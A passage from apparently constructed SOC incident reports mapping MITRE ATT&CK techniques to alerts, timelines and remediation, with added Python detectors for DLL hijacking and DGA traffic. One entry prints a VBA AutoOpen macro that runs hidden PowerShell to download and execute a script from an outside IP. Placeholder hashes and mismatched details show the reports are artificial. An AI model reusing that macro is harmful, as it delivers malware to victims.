– Exploit successfully escalated to SYSTEM
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Qualys + EDR correlation | Qualys, CrowdStrike | Confirmed exploit execution and SYSTEM shell |
| 2. Immediate Action | Terminate SYSTEM shell | CrowdStrike | SYSTEM shell (cmd.exe) killed |
| 3. Network Block | Block C2 connection | Palo Alto Firewall | C2 IP blocked |
| 4. Exploit Removal | Delete exploit.exe | CrowdStrike Live Response | Malicious file removed |
| 5. Patch Application | Apply missing patch | SCCM, WSUS | KB5034123 deployed to all vulnerable hosts |
| 6. Threat Hunting | Check for other exploit usage | CrowdStrike, Splunk | No other hosts showed same behavior |
Jira Incident Report
Ticket: SOC-2024-088
Summary: T1068 – Kernel Exploit (CVE-2024-1234) Successfully Escalates to SYSTEM
Status: RESOLVED
Resolution: MALICIOUS – Exploit Contained
Priority: P1 – CRITICAL
Labels: T1068, privilege-escalation, kernel-exploit, cve-2024-1234, qualys
Components: Vulnerability-Management, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Qualys Vulnerability Management + EDR correlation.
Alert: “CVE-2024-1234 Exploit Attempt Detected”.
Host: ENG-WS-056 (Engineering Department, user rjohnson).
Time: 2024-02-17 11:30 EST.
Technique: MITRE ATT&CK T1068 – Exploitation for Privilege Escalation.
2. Technical Analysis:
Attack Chain:
11:15 – User downloads exploit.exe from GitHub (PoC repository)
11:20 – User runs exploit.exe (thinking it’s a “security tool”)
11:21 – exploit.exe checks OS version, finds vulnerable (unpatched)
11:22 – Exploit triggers kernel race condition
11:23 – Kernel memory corruption successful
11:24 – SYSTEM shell (cmd.exe) spawned
11:25 – SYSTEM shell connects to C2 at 185.143.221[.]89:443
11:26 – Qualys + CrowdStrike alerts
Vulnerability Details:
CVE: CVE-2024-1234 (Windows Kernel Privilege Escalation)
Component: win32k.sys (window manager)
Patch: KB5034123 (available 2024-01-15)
Root Cause: Missing patch (36 days unpatched)
Exploit Analysis:
File: exploit.exe (SHA256: b2c3d4e5f6…)
Source: Public GitHub repository (since removed)
Capabilities:
Checks OS version for vulnerability
Triggers race condition in kernel object manager
Spawns SYSTEM shell on success
Downloads additional payload from C2
Post-Exploitation:
SYSTEM shell connected to C2 at 11:25
Beacon sent system information
No additional commands before termination
3. Investigation Findings:
Timeline:
11:15 – Exploit downloaded
11:24 – SYSTEM shell created
11:25 – C2 connection
11:26 – Alerts trigger
11:27 – SOC investigates
11:28 – SYSTEM shell terminated
11:29 – C2 IP blocked
Indicators of Compromise (IoCs):
Files:
– exploit.exe (SHA256: b2c3d4e5f6…)
Network:
– C2: 185.143.221[.]89:443
Process:
– SYSTEM shell (cmd.exe)
4. Containment Actions:
Immediate Actions:
Terminated SYSTEM shell.
Deleted exploit.exe.
Blocked C2 IP at firewall.
Isolated host temporarily.
Patch Remediation:
Applied KB5034123 to affected host.
Scanned all systems for missing patch.
Deployed patch enterprise-wide via SCCM.
User Remediation:
User counseled on downloading exploits.
Escalated to manager.
Required security training.
5. Root Cause Analysis:
Primary Cause: Missing critical patch (KB5034123) for 36 days.
Contributing Factors:
Patch management failure (host missed monthly patch cycle).
User downloaded and executed public exploit.
No application control blocking unknown executables.
6. Business Impact:
Operational Impact: Engineering workstation offline for 2 hours.
Security Impact: SYSTEM access achieved for 2 minutes.
Data Exposure: System information sent to C2 (no sensitive data).
7. Remediation & Prevention:
Completed Actions:
SYSTEM shell terminated.
Exploit removed.
Patch applied.
C2 blocked.
Technical Controls Enhanced:
Ensured all systems receive critical patches within 7 days.
Implemented application control (CrowdStrike Falcon Prevent).
Enhanced vulnerability scanning frequency (daily for critical).
Created alert for any privilege escalation attempts.
8. Conclusion:
An unpatched engineering workstation allowed a user-executed exploit to successfully escalate to SYSTEM privileges. The exploit connected to C2 before detection. Rapid response terminated the shell and blocked the C2. The missing patch was applied enterprise-wide.
Closure Rationale: SYSTEM shell terminated; patch applied; exploit removed.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-17 12:30 EST
49. T1574 – Hijack Execution Flow (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-DLL-HIJACK-1574-7842
Alert Time: 2024-02-17 16:30:15 EST
Severity: HIGH (88/100)
Source: Sysmon (Event ID 7 – Image Loaded)
Rule: “DLL Loaded from Unusual Path by Trusted Process”
MITRE ATT&CK: T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking
Alert Details:
Event ID: 7 (Image Loaded)
Time: 16:25 EST
Host: APP-SRV-045 (Application Server)
Process: sqlservr.exe (Microsoft SQL Server – PID: 1245)
User: NETWORK SERVICE
Image Loaded:
– Path: C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\version.dll
– Expected Path: C:\Windows\System32\version.dll
– Hashes: SHA256=c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2
Anomaly Detection:
– version.dll is a legitimate Windows DLL, but loaded from SQL Server directory
– SQL Server should load version.dll from System32
– DLL was created 5 minutes prior (16:20 EST)
– Created by: powershell.exe (running as NETWORK SERVICE)
Additional Sysmon Events:
– Event ID 11 (FileCreate): C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\version.dll
– Event ID 1 (ProcessCreate): powershell.exe downloading file
DLL Analysis:
– Malicious DLL masquerading as version.dll
– Exports legitimate version.dll functions + additional malicious code
– When loaded by sqlservr.exe, connects to 194.165.16[.]89:443
– Establishes persistence in SQL Server process
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Sysmon events | Splunk, Sysmon Logs | Confirmed DLL search order hijacking |
| 2. Process Analysis | Identify process loading malicious DLL | CrowdStrike | sqlservr.exe loaded version.dll from Binn folder |
| 3. DLL Analysis | Analyze version.dll | CrowdStrike Sandbox | DLL contains backdoor; connects to C2 |
| 4. Immediate Action | Stop SQL Server service, remove DLL | Services, PowerShell | Service stopped; malicious DLL deleted |
| 5. Network Block | Block C2 communication | Palo Alto Firewall | C2 IP blocked |
| 6. Threat Hunting | Check for other DLL hijacks | CrowdStrike, Sysmon | No other occurrences found |
Jira Incident Report
Ticket: SOC-2024-089
Summary: T1574 – DLL Search Order Hijacking in SQL Server
Status: RESOLVED
Resolution: MALICIOUS – DLL Removed
Priority: P2 – MEDIUM
Labels: T1574, dll-hijacking, execution-flow, sql-server, sysmon
Components: Endpoint-Security, Application-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 7 (Image Loaded).
Alert: “DLL Loaded from Unusual Path by Trusted Process”.
Host: APP-SRV-045 (Application Server).
Process: sqlservr.exe (Microsoft SQL Server).
Time: 2024-02-17 16:30 EST.
Technique: MITRE ATT&CK T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking.
2. Technical Analysis:
Attack Chain:
16:15 – Attacker gains access via compromised service account
16:16 – PowerShell downloads malicious version.dll from 185.143.221[.]89
16:20 – DLL saved to SQL Server Binn directory
16:21 – SQL Server restarts (triggered by attacker)
16:22 – sqlservr.exe starts, searches for version.dll
16:23 – Finds malicious version.dll in Binn directory (before System32)
16:23 – Malicious DLL loads, connects to C2
16:30 – Sysmon detects unusual DLL load
DLL Search Order Hijacking:
Legitimate DLL: version.dll (Windows system file)
Hijacked Path: C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\
Why It Works: Windows searches application directory before System32
Effect: SQL Server loads attacker’s DLL instead of legitimate one
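Detection logic for the search-order anomaly described above, as an added example that is not code from the original report or from Sysmon: it flags a known Windows system DLL loaded from outside the Windows directories, checks the load's signature fields, and ties the load back to the Sysmon FileCreate event that staged the file. Events, timestamps and hashes are constructed; the list of commonly planted DLLs is an assumption.

```python
"""Flag Windows system DLLs loaded from an application directory (T1574.001).

Added example, not code from the original report. Input events are constructed
dicts using Sysmon's field names for Event ID 7 (ImageLoaded) and
Event ID 11 (FileCreate); UtcTime uses Sysmon's "YYYY-MM-DD HH:MM:SS.mmm" form.
"""
from datetime import datetime

# DLLs that ship in System32 and are commonly planted beside an application
# binary so the loader finds the planted copy first (assumed list).
SYSTEM_DLLS = {"version.dll", "dbghelp.dll", "cryptsp.dll", "cryptbase.dll",
               "wtsapi32.dll", "userenv.dll", "profapi.dll", "winhttp.dll",
               "dwmapi.dll", "uxtheme.dll", "sspicli.dll", "propsys.dll"}

# Directories these DLLs are expected to load from.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\windows\\winsxs\\")


def _norm(path):
    return path.replace("/", "\\").lower()


def _ts(ev):
    return datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def flag_dll_hijack(events, max_age_minutes=60):
    """Return one finding per suspicious image load, each with its reasons."""
    # Index FileCreate events so a load can be tied to the write that staged it.
    created = {_norm(ev["TargetFilename"]): ev for ev in events if ev["EventID"] == 11}
    findings = []
    for ev in events:
        if ev["EventID"] != 7:
            continue
        loaded = _norm(ev["ImageLoaded"])
        directory, _, name = loaded.rpartition("\\")
        if name not in SYSTEM_DLLS or loaded.startswith(TRUSTED_DIRS):
            continue  # not a hijack candidate, or loaded from where it belongs
        reasons = [f"{name} loaded from {directory} rather than a Windows system directory"]
        # A genuine copy of a Windows DLL carries a valid Microsoft signature.
        if not (ev.get("Signed") == "true" and ev.get("SignatureStatus") == "Valid"
                and ev.get("Signature", "").startswith("Microsoft")):
            reasons.append(f"signature check failed (Signed={ev.get('Signed')}, "
                           f"Status={ev.get('SignatureStatus')})")
        staged = created.get(loaded)
        if staged:
            age = (_ts(ev) - _ts(staged)).total_seconds() / 60
            if 0 <= age <= max_age_minutes:
                reasons.append(f"file written {age:.0f} min before load by {staged['Image']}")
        findings.append({"process": ev["Image"], "dll": ev["ImageLoaded"],
                         "hashes": ev.get("Hashes", ""), "reasons": reasons})
    return findings


BINN = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn"
SQLSERVR = BINN + r"\sqlservr.exe"
SAMPLE_EVENTS = [  # constructed, modelled on the APP-SRV-045 chain (UTC times)
    {"EventID": 11, "UtcTime": "2024-02-17 21:20:00.000",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": BINN + r"\version.dll"},
    {"EventID": 7, "UtcTime": "2024-02-17 21:23:05.000", "Image": SQLSERVR,
     "ImageLoaded": BINN + r"\version.dll", "Hashes": "SHA256=<constructed>",
     "Signed": "false", "Signature": "-", "SignatureStatus": "Unavailable"},
    # Benign: the same DLL from System32 with a valid Microsoft signature.
    {"EventID": 7, "UtcTime": "2024-02-17 21:23:06.000", "Image": SQLSERVR,
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Hashes": "SHA256=<constructed>",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    # Benign: an application DLL loaded from its own directory.
    {"EventID": 7, "UtcTime": "2024-02-17 21:23:07.000", "Image": SQLSERVR,
     "ImageLoaded": BINN + r"\sqlmin.dll", "Signed": "true",
     "Signature": "Microsoft Corporation", "SignatureStatus": "Valid"},
]

if __name__ == "__main__":
    for f in flag_dll_hijack(SAMPLE_EVENTS):
        print(f["process"], "->", f["dll"])
        for r in f["reasons"]:
            print("  -", r)
```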
Malicious DLL Analysis:
File: version.dll (SHA256: c3d4e5f6…)
Exports: All legitimate version.dll exports (to avoid errors)
Backdoor: When loaded, it:
Creates hidden thread in sqlservr.exe
Connects to C2 at 194.165.16[.]89:443
Waits for commands (execute, exfiltrate, pivot)
C2 Communication:
Established at 16:23
Beacon every 60 seconds
No data exfiltration before containment
3. Investigation Findings:
Timeline:
16:15 – Attacker access
16:16-16:20 – DLL downloaded
16:21 – SQL Server restarted
16:23 – DLL loads, C2 connects
16:30 – Sysmon alert
16:32 – SOC investigates
16:35 – Service stopped, DLL deleted
Indicators of Compromise (IoCs):
Files:
– C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\version.dll (SHA256: c3d4e5f6…)
Network:
– C2: 194.165.16[.]89:443
– Download URL: http://185.143.221[.]89/version.dll
Account:
– Compromised service account (svc_sql)
4. Containment Actions:
Immediate Actions:
Stopped SQL Server service.
Deleted malicious version.dll.
Restarted SQL Server (loads legitimate DLL from System32).
Blocked C2 IP at firewall.
Service Account Remediation:
Identified compromised service account (svc_sql).
Reset password.
Audited account activity.
Host Remediation:
Full scan (no other malware).
Verified SQL Server functioning normally.
5. Root Cause Analysis:
Primary Cause: Compromised service account allowed DLL upload.
Contributing Factors:
SQL Server directory writable by service account (over-privileged).
DLL search order hijacking possible (no secure DLL loading).
No file integrity monitoring for application directories.
6. Business Impact:
Operational Impact: SQL Server offline for 15 minutes.
Data Exposure: None (C2 contained).
7. Remediation & Prevention:
Completed Actions:
Malicious DLL removed.
Service account secured.
C2 blocked.
Technical Controls Enhanced:
Restricted write permissions on application directories.
Enabled Safe DLL Search Mode via GPO.
Implemented application whitelisting (CrowdStrike Falcon Prevent).
Created Sysmon alert for any DLL loads from non-standard paths.
8. Conclusion:
An attacker used a compromised service account to plant a malicious DLL in the SQL Server directory, hijacking the DLL search order. The malicious DLL loaded when SQL Server restarted and connected to C2. Sysmon detected the anomalous DLL load, enabling rapid removal.
Closure Rationale: Malicious DLL removed; service account secured; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-17 17:30 EST
50. T1568 – Dynamic Resolution (Cisco Umbrella Detection)
Cisco Umbrella Alert Details
Alert ID: UMBRELLA-DGA-1568-7842
Alert Time: 2024-02-17 08:30:22 EST
Severity: HIGH (82/100)
Source: Cisco Umbrella Investigate + Security Graph
Rule: “DGA Domain Query – Potential Malware Beaconing”
MITRE ATT&CK: T1568.002 – Dynamic Resolution: Domain Generation Algorithms
Alert Details:
DNS Query Details:
– Client IP: 192.168.45.78 (Internal – MKT-WS-023)
– User: sjones (Sarah Jones, Marketing)
– Time: 08:15-08:30 EST
– Queries: 47 unique domains in 15 minutes
Domain Examples:
– 8f7g6h5j4k3l2.com
– asdfghjklqwerty.net
– zxcvbnmasdfghj.org
– 1234567890abcdef.biz
– q1w2e3r4t5y6u7.info
Domain Characteristics:
– All domains: Random 16-20 character strings
– All TLDs: .com, .net, .org, .biz, .info (mix)
– Registration: All registered in last 24 hours
– Resolutions: 5 domains resolved to 185.143.221[.]89
– Others: NXDOMAIN (algorithm testing)
Detection Logic:
– Pattern matches known DGA (Domain Generation Algorithm)
– 47 unique domains in 15 minutes (unusual for legitimate user)
– Domains follow no semantic pattern
– 5 domains resolved to same malicious IP
– IP known for malware C2
Threat Intelligence:
– DGA pattern matches “TrickBot” malware family
– Algorithm: Seed based on current date
– Domains generated daily
– Malware attempts to connect to each until one resolves
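Detection logic of the kind the alert describes, as an added example that is not code from the original report or from Cisco Umbrella: it scores each queried second-level label on length, vowel ratio, digit count and character entropy, then counts generated-looking names per client in a 15-minute window and reports the NXDOMAIN ratio. Log lines are constructed (fewer than the incident's 47 queries), and the thresholds are assumptions to tune against your own baseline.

```python
"""Score DNS query logs for DGA beaconing (T1568.002).

Added example, not code from the original report or from Cisco Umbrella.
Each log line is a constructed "<ISO time> <client IP> <query name> <rcode>" record.
"""
import math
from collections import defaultdict
from datetime import datetime, timedelta

VOWELS = set("aeiou")


def label_entropy(label):
    """Shannon entropy in bits per character; random strings score near log2(len)."""
    n = len(label)
    if n == 0:
        return 0.0
    counts = {ch: label.count(ch) for ch in set(label)}
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def dga_score(qname):
    """0-4 points for the registrable (second-level) label; 3 or more looks generated."""
    parts = qname.lower().rstrip(".").split(".")
    label = parts[-2] if len(parts) >= 2 else parts[0]
    letters = [c for c in label if c.isalpha()]
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters) if letters else 0.0
    digits = sum(c.isdigit() for c in label)
    score = 0
    score += len(label) >= 12               # long labels, as in the alert's examples
    score += vowel_ratio < 0.2              # pronounceable words carry far more vowels
    score += digits >= 3                    # digit-heavy labels such as q1w2e3r4t5y6u7
    score += label_entropy(label) >= 3.5    # near-uniform character use
    return score


def looks_generated(qname):
    return dga_score(qname) >= 3


def parse_line(line):
    ts, client, qname, rcode = line.split()
    return datetime.fromisoformat(ts), client, qname, rcode


def find_dga_clients(lines, window=timedelta(minutes=15), min_domains=20):
    """Clients that queried at least min_domains distinct generated-looking
    names inside one window. The NXDOMAIN ratio is reported because a DGA
    host fails most lookups until it reaches a registered domain."""
    per_client = defaultdict(list)
    for line in lines:
        ts, client, qname, rcode = parse_line(line)
        if looks_generated(qname):
            per_client[client].append((ts, qname, rcode))
    alerts = {}
    for client, recs in per_client.items():
        recs.sort()
        for start, _, _ in recs:
            hits = [r for r in recs if start <= r[0] <= start + window]
            domains = {q for _, q, _ in hits}
            if len(domains) >= min_domains:
                nx = sum(rc == "NXDOMAIN" for _, _, rc in hits)
                alerts[client] = {"unique_domains": len(domains),
                                  "nxdomain_ratio": round(nx / len(hits), 2),
                                  "first_seen": start.isoformat()}
                break
    return alerts


# Constructed sample modelled on the MKT-WS-023 alert; 192.168.45.12 is a clean client.
SAMPLE_LOG = [
    "2024-02-17T08:15:00 192.168.45.78 8f7g6h5j4k3l2.com NOERROR",
    "2024-02-17T08:15:40 192.168.45.78 kjhgfdsplmnbvc.com NXDOMAIN",
    "2024-02-17T08:16:10 192.168.45.78 login.microsoftonline.com NOERROR",
    "2024-02-17T08:16:30 192.168.45.78 asdfghjklqwerty.net NOERROR",
    "2024-02-17T08:17:20 192.168.45.78 x9c4v7b2n5m8q1.net NXDOMAIN",
    "2024-02-17T08:17:45 192.168.45.78 www.windowsupdate.com NOERROR",
    "2024-02-17T08:18:05 192.168.45.78 zxcvbnmasdfghj.org NOERROR",
    "2024-02-17T08:19:10 192.168.45.78 trwqplmnbvcxzs.org NXDOMAIN",
    "2024-02-17T08:20:00 192.168.45.12 sharepointonline.com NOERROR",
    "2024-02-17T08:20:00 192.168.45.78 1234567890abcdef.biz NOERROR",
    "2024-02-17T08:21:00 192.168.45.12 cdn-7f3a2b.example.net NOERROR",
    "2024-02-17T08:21:15 192.168.45.78 7hg3kd9sl2pq4m.biz NXDOMAIN",
    "2024-02-17T08:22:30 192.168.45.78 q1w2e3r4t5y6u7.info NOERROR",
    "2024-02-17T08:23:45 192.168.45.78 mnbvcxzlkjhgfd.info NXDOMAIN",
    "2024-02-17T08:25:00 192.168.45.78 qwrtypsdfghjkl.com NXDOMAIN",
    "2024-02-17T08:26:10 192.168.45.78 3k8d2s7f1g9h4j.net NXDOMAIN",
    "2024-02-17T08:27:20 192.168.45.78 zpxqvwrtmnbklj.org NXDOMAIN",
    "2024-02-17T08:28:30 192.168.45.78 5j9k1l3m7n2p6q.biz NXDOMAIN",
]

if __name__ == "__main__":
    # The sample is smaller than the incident, so the threshold is lowered here.
    print(find_dga_clients(SAMPLE_LOG, min_domains=10))
```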
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Umbrella alert | Cisco Umbrella Dashboard | Confirmed DGA pattern from host |
| 2. Host Investigation | Identify process making DNS queries | CrowdStrike Falcon | svchost.exe with injected code making DNS queries |
| 3. Malware Analysis | Extract and analyze malware | CrowdStrike Sandbox | TrickBot variant using DGA for C2 |
| 4. Immediate Action | Isolate host | CrowdStrike | Host quarantined |
| 5. DNS Blocking | Block DGA domains | Cisco Umbrella | All generated domains added to blocklist |
| 6. Threat Hunting | Check for other DGA activity | Umbrella, Splunk | No other hosts with same pattern |
Jira Incident Report
Ticket: SOC-2024-090
Summary: T1568 – DGA Domain Queries Indicating TrickBot Infection
Status: RESOLVED
Resolution: MALICIOUS – Malware Contained
Priority: P2 – MEDIUM
Labels: T1568, dynamic-resolution, dga, trickbot, cisco-umbrella
Components: Network-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Cisco Umbrella Investigate.
Alert: “DGA Domain Query – Potential Malware Beaconing”.
Host: MKT-WS-023 (Marketing Department, user sjones).
Time: 2024-02-17 08:30 EST.
Technique: MITRE ATT&CK T1568.002 – Dynamic Resolution: Domain Generation Algorithms.
2. Technical Analysis:
Attack Chain:
07:45 – User clicked phishing email link
07:46 – TrickBot downloaded and executed
07:47 – Malware injects into svchost.exe
07:48 – Malware begins DGA algorithm (based on date)
07:48-08:15 – Generates and queries 47 domains
08:15 – 5 domains resolve to C2 IP 185.143.221[.]89
08:15 – Malware establishes C2 connection
08:30 – Cisco Umbrella detects DGA pattern
DGA Analysis:
Malware: TrickBot variant
Algorithm: Based on current date seed
Domains Generated: 47 in first wave
Success Rate: 5/47 resolved (10.6%)
Purpose: Evade domain blocklists by generating new domains daily
C2 Communication:
IP: 185.143.221[.]89:443
Protocol: HTTPS with custom certificate
Beacon: Every 5 minutes after initial connection
Data Exfiltrated: System information, browser history
Malware Analysis:
File: invoice_7842.docm (phishing attachment)
Dropper: Macro downloaded TrickBot payload
Injection: Malware injected into svchost.exe (living off the land)
3. Investigation Findings:
Timeline:
07:45 – Phishing email opened
07:46-08:15 – Malware installation and DGA
08:15 – C2 connection established
08:30 – Umbrella alert
08:32 – SOC investigates
08:35 – Host isolated
08:40 – Malware removed
Indicators of Compromise (IoCs):
Network:
– DGA Domains (47 total – list attached)
– C2 IP: 185.143.221[.]89
Files:
– invoice_7842.docm (SHA256: a1b2c3d4…)
– TrickBot payload (SHA256: b2c3d4e5…)
Process:
– svchost.exe (injected)
4. Containment Actions:
Immediate Actions:
Isolated host via CrowdStrike.
Blocked all DGA domains in Cisco Umbrella.
Blocked C2 IP at firewall.
Terminated malicious processes.
Malware Removal:
Removed injected code from svchost.exe.
Deleted TrickBot payload and dropper.
Full scan (clean).
User Remediation:
Password reset.
Phishing training assigned.
Reported email to security team.
5. Root Cause Analysis:
Primary Cause: User clicked phishing email with malicious macro.
Contributing Factors:
Macros enabled in Office.
No ASR rule blocking Office child processes.
User lacked recent phishing training.
6. Business Impact:
Operational Impact: Marketing workstation offline for 3 hours.
Data Exposure: System information, browser history exfiltrated.
Reputational Impact: Internal only.
7. Remediation & Prevention:
Completed Actions:
Malware removed.
Host cleaned.
User educated.
C2 blocked.
Technical Controls Enhanced:
Enabled ASR rule “Block Office applications from creating child processes”.
Blocked macros from internet via GPO.
Enhanced Umbrella monitoring for DGA patterns.
Created automated alert for DGA domain queries.
8. Conclusion:
A TrickBot infection used DGA to generate and query 47 domains, evading static domain blocklists. Five domains resolved to the C2, allowing beaconing. Cisco Umbrella detected the DGA pattern, enabling rapid containment. No significant data loss occurred.
Closure Rationale: Malware removed; user educated; DGA monitoring enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-17 09:30 EST
51. T1137 – Office Application Startup (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-OFFICE-STARTUP-1137-7842
Alert Time: 2024-02-18 09:30:15 EST
Severity: HIGH (85/100)
Source: Microsoft Defender for Endpoint
Rule: “Office Application Startup Persistence Detected”
MITRE ATT&CK: T1137.001 – Office Application Startup: Office Template Macros
Alert Details:
Detection: Malicious macro added to Office template for persistence
**Host:** FIN-WS-078 (Finance Department)
**User:** bturner (Brian Turner, Accountant)
**Time:** 09:25 EST
File Details:
Path: C:\Users\bturner\AppData\Roaming\Microsoft\Templates\Normal.dotm
Modification Time: 09:20 EST
Original Hash: 7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b
Current Hash: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Modified By: WINWORD.EXE (PID: 7842)
Macro Analysis:
Macro Name: “AutoOpen”
VBA Code:

```vb
Sub AutoOpen()
    Dim objShell As Object
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "powershell -WindowStyle Hidden -Command ""Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; powershell -ExecutionPolicy Bypass -File %temp%\update.ps1""", 0, False
End Sub
```
Process Tree:
WINWORD.EXE (PID: 7842) – user opened Word
powershell.exe (PID: 7890) – spawned by macro
Network connection to 185.143.221[.]89:80
Detection Logic:
Normal.dotm template modified (unusual)
AutoOpen macro added (auto-executes when Word starts)
Macro downloads and runs PowerShell script
Persistence: Every time Word starts, macro executes
Additional Context:
User opened Word document from email attachment
Document contained macro that modified Normal.dotm
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed Normal.dotm modification with malicious macro |
| 2. Macro Analysis | Extract and analyze VBA code | Manual review | AutoOpen macro downloads PowerShell payload |
| 3. Network Check | Check for C2 connections | Zscaler Logs, Firewall | Connection to 185.143.221[.]89:80 successful |
| 4. Immediate Action | Remove malicious macro | PowerShell, Word | Normal.dotm restored from backup |
| 5. Host Isolation | Isolate host | Defender | Host quarantined |
| 6. User Interview | Contact user | Teams, Phone | User opened “invoice.docm” from email |
Jira Incident Report
**Ticket:** SOC-2024-091
**Summary:** T1137 – Office Template Macro Persistence Installed
**Status:** RESOLVED
**Resolution:** MALICIOUS – Persistence Removed
**Priority:** P2 – MEDIUM
**Labels:** T1137, office-startup, macro-persistence, defender, phishing
**Components:** Endpoint-Security, Phishing-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Office Application Startup Persistence Detected”.
Host: FIN-WS-078 (Finance Department, user bturner).
File: C:\Users\bturner\AppData\Roaming\Microsoft\Templates\Normal.dotm.
Time: 2024-02-18 09:30 EST.
Technique: MITRE ATT&CK T1137.001 – Office Application Startup: Office Template Macros.
2. Technical Analysis:
Attack Chain:
09:10 – User receives email from “vendor@payment-update[.]net”
09:12 – Email contains attachment “invoice.docm”
09:15 – User opens attachment, enables macros (prompted by document)
09:16 – Macro executes, modifies Normal.dotm template
09:17 – AutoOpen macro added to Normal.dotm
09:18 – Word exits (normal)
09:20 – User restarts Word (for legitimate work)
09:21 – AutoOpen macro triggers, downloads PowerShell
09:22 – PowerShell connects to C2
09:25 – Defender detects template modification
Persistence Mechanism:
File: Normal.dotm (global template for Word)
Macro: AutoOpen (runs automatically when Word starts)
Effect: Every time user opens Word, macro downloads and runs payload
Persistence: Survives reboots; triggers on application start
Macro Analysis:
AutoOpen macro downloads update.ps1 from 185.143.221[.]89
update.ps1 (SHA256: b2c3d4e5…) contains Cobalt Strike beacon
Beacon connects to same C2 on port 443
C2 Communication:
Established at 09:22
Beacon every 60 seconds
No data exfiltration before containment
3. Investigation Findings:
Timeline:
09:10 – Phishing email received
09:15 – User opens attachment
09:16-09:17 – Normal.dotm modified
09:20 – Word restarted (legitimate)
09:21-09:22 – Payload downloaded, C2 connected
09:25 – Defender alert
09:27 – SOC investigates
09:30 – Normal.dotm restored
Indicators of Compromise (IoCs):
Files:
– Normal.dotm (modified) – SHA256: a1b2c3d4…
– invoice.docm (original) – SHA256: b2c3d4e5…
– update.ps1 – SHA256: c3d4e5f6…
Network:
– C2: 185.143.221[.]89:80 (download), :443 (beacon)
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice Overdue”
4. Containment Actions:
Immediate Actions:
Restored Normal.dotm from backup (clean version).
Deleted invoice.docm and update.ps1.
Isolated host via Defender.
Blocked C2 IP at firewall.
Host Remediation:
Full scan (no other malware).
Verified Word functions normally.
No reimage needed.
User Remediation:
Password reset.
Phishing training assigned.
Reported email to security team.
5. Root Cause Analysis:
Primary Cause: User opened malicious document and enabled macros.
Contributing Factors:
Macros enabled in Office.
No ASR rule blocking Office from modifying templates.
User lacked recent phishing training.
6. Business Impact:
Operational Impact: Finance workstation offline for 2 hours.
Data Exposure: None (C2 contained).
7. Remediation & Prevention:
Completed Actions:
Normal.dotm restored.
Malware removed.
User educated.
C2 blocked.
Technical Controls Enhanced:
Enabled ASR rule “Block Office applications from creating child processes”.
Blocked macros from internet via GPO.
Set Normal.dotm to read-only via GPO.
Enhanced monitoring for Office template modifications.
8. Conclusion:
A phishing email with a malicious macro modified the user’s Normal.dotm template, installing persistence that triggered every time Word started. Defender detected the template modification, enabling rapid restoration before significant C2 activity occurred.
Closure Rationale: Normal.dotm restored; malware removed; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-18 10:30 EST
52. T1542 – Pre-OS Boot (HP Wolf Security Detection)
HP Wolf Security Alert Details
**Alert ID:** HP-WOLF-UEFI-1542-7842
**Alert Time:** 2024-02-18 14:30:22 EST
**Severity:** CRITICAL (98/100)
**Source:** HP Wolf Security (Hardware-Enforced Security)
**Rule:** “UEFI Firmware Modification Detected”
**MITRE ATT&CK:** T1542.001 – Pre-OS Boot: System Firmware
Alert Details:
Detection: UEFI firmware integrity check failed on boot
**Host:** EXEC-WS-001 (CEO’s Laptop – Surface Laptop 5)
**User:** cjohnson (CEO)
**Time:** 14:25 EST (boot time)
**Event:** Secure Boot violation + firmware hash mismatch
UEFI Details:
Expected Firmware Hash: 7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b
Current Firmware Hash: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Modification Time: Unknown (persists across reboots)
Secure Boot Status: Bypassed (keys modified)
HP Wolf Security Analysis:
Firmware modified to include malicious DXE driver
Driver loaded before OS: “BootkitDriver.efi”
Capabilities:
Injects malicious code into Windows boot process
Bypasses EDR/AV (runs before OS)
Establishes persistence even after OS reinstall
Can disable Secure Boot and other protections
Additional Context:
Laptop was physically unattended for 30 minutes yesterday
Hotel room during business trip (possible physical access)
No signs of OS-level compromise (CrowdStrike clean)
HP Sure Start detected and blocked boot
System prevented from booting (bricked as protection)
Threat Intelligence:
